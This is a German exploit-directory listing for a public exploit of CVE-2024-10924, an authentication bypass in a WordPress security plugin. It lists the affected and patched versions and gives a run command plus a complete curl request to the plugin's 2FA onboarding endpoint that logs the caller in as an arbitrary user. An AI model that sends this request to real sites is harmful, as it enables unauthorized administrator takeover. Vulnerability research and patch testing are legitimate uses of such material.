Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10924 — Exploit für CVE-2024-10924, eine kritische Authentifizierungsumgehung im WordPress Really Simple Security Plugin (Versionen 9.0.0-9.1.1.1). Ermöglicht nicht authentifizierten Angreifern, sich als beliebiger Benutzer anzumelden, aufgrund eines Fehlers in der Two-Factor Authentication API. | Kitploit
Tools/GitHubGitHub/cy3erdr4g0n/cve-2024-10924
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & Bildung
GitHubcy3erdr4g0n/cve-2024-10924

CVE-2024-10924

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Exploit für CVE-2024-10924, eine kritische Authentifizierungsumgehung im WordPress Really Simple Security Plugin (Versionen 9.0.0-9.1.1.1). Ermöglicht nicht authentifizierten Angreifern, sich als beliebiger Benutzer anzumelden, aufgrund eines Fehlers in der Two-Factor Authentication API.

vor 1 JahrNoch nicht geprüft
Teilen

Exploit für CVE-2024-10924 (WordPress Really Simple Security Plugin - Authentifizierungsumgehung)

📌 Übersicht

CVE-2024-10924 ist eine kritische Authentifizierungsumgehungsschwachstelle im Really Simple Security Plugin für WordPress (Versionen 9.0.0 bis 9.1.1.1). Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, sich als beliebiger Benutzer (einschließlich Administrator) anzumelden, indem sie einen Fehler in der Zwei-Faktor-Authentifizierungs-API (2FA) ausnutzen.

CVE-ID: CVE-2024-10924

Schweregrad: 🔥 Kritisch (CVSS 9.8)

Betroffene Versionen: Really Simple Security 9.0.0 – 9.1.1.1

Gepatchte Version: 9.1.2

Exploit-Typ: Authentifizierungsumgehung

⚠️ Haftungsausschluss

🚨 Dieser Exploit dient ausschließlich Bildungs- und Sicherheitsforschungszwecken.

Die unbefugte Nutzung auf Systemen, die Ihnen nicht gehören, ist illegal. Ziel ist es, Sicherheitsexperten dabei zu helfen, anfällige Systeme zu testen und zu patchen.

🔧 Voraussetzungen

Eine WordPress-Seite, die eine anfällige Version des Really Simple Security Plugins ausführt. Python 3.x oder cURL installiert zum Testen. Der Ziel-WordPress-Administrator-Benutzername (Benutzerenumeration kann erforderlich sein).

Skript ausführen:

python3 exploit.py <url example : http://target.com> <user_id>

manuell mit Curl

curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v

Tool herunterladen